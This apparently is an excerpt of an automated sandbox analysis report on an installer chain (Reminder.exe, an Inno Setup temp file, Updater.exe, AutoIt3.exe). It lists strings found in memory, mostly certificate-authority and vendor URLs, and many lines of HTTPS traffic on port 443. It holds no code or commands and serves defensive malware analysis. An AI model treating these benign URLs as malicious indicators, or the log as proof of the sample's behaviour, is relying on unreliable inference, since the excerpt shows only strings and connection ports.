                      Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com01
                      Source: Updater.exe, 0000001C.00000000.1722434360.00000000007A5000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000000.2362895220.0000000000D45000.00000002.00000001.01000000.0000000D.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
                      Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.certum.pl/CPS0
                      Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://jrsoftware.org/
                      Source: Reminder.exe, 00000000.00000000.1678698708.0000000000861000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                      Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://jrsoftware.org0
                      Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                      Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                      Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.certum.pl/CPS0
                      Source: AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
                      Source: Reminder.exe, 00000000.00000003.1680434117.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, Reminder.exe, 00000000.00000003.1680920376.000000007F2BB000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000000.1682457089.0000000000A41000.00000020.00000001.01000000.00000004.sdmp, Reminder.tmp, 00000003.00000000.1688593494.0000000000F1D000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.innosetup.com/
                      Source: Reminder.exe, 00000000.00000003.1680434117.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, Reminder.exe, 00000000.00000003.1680920376.000000007F2BB000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000000.1682457089.0000000000A41000.00000020.00000001.01000000.00000004.sdmp, Reminder.tmp, 00000003.00000000.1688593494.0000000000F1D000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.remobjects.com/ps
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57886 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57943 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57989 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57966 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57805 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57748 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57931 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57908 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57977 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57851 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57794 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57919 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57875 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57932 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57852 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57885 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57990 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57897 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57954 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57874 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57863 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57965 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57804 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57896 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57873 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57850 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57829 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57838 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57910 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57956 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57773 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57921 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57967 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57988 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57955 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57978 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57762 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57817 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57922 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57895 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57933 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57828 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57884 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57944 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57839 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57905 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57928 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57825 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57940 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57883 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57763 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57952 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57837 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57802 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57871 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57894 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57974 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57798 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57939 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57813 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57987 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57906 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57849 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57962 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57917 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57951 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57787 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57930 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57953 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57976 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57918 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57985 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57847 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57929 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57826 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57882 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57858 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57942 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57907 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57997 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57859 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57941 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57881 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57964 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57836 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57803 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57788 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57870 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57975 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57799 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57814 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57986 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57806
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57927
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57805
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57926
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57929
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57807
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57928
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57802
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57923
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57801
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57922
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57804
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57925
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57803
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57924
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57921
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57834 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57937 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57914 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57822 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57938
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57816
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57937
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57819
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57818
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57939
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57813
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57934
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57812
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57933
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57815
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57960 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57814
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57925 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57935
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57868 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57930
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57811
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57932
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57810
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57931
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57995 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57892 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57869 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57828
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57949
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57827
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57948
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57959 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57984 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57829
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57945
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57823
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57944
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57826
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57825
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57926 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57946
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57820
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57903 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57941
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57940
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57822
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57943
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57942
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57950
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57971 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57891 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57839
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57838
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57959
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57948 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57956
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57834
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57955
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57837
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57958
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57996 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57836
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57831
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57952
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57778 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57951
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57712
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57833
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57954
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57953
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57961
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57810 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57880 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57844 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57982 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57867 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57973 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57950 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57904 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57833 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57915 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57879 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57823 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57908
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57800 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57905
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57904
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57907
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57906
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57949 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57901
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57961 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57900
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57903
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57902
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57791 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57916 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57919
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57916
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57927 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57915
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57845 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57918
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57917
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57983 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57912
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57911
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57914
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57913
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57910
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57856 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57938 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57972 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57890 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57819 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57957 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57886
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57885
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57887
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57771
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57892
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57895
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57894
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57891
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57890
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57992 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57981 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57843 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57889 -> 443
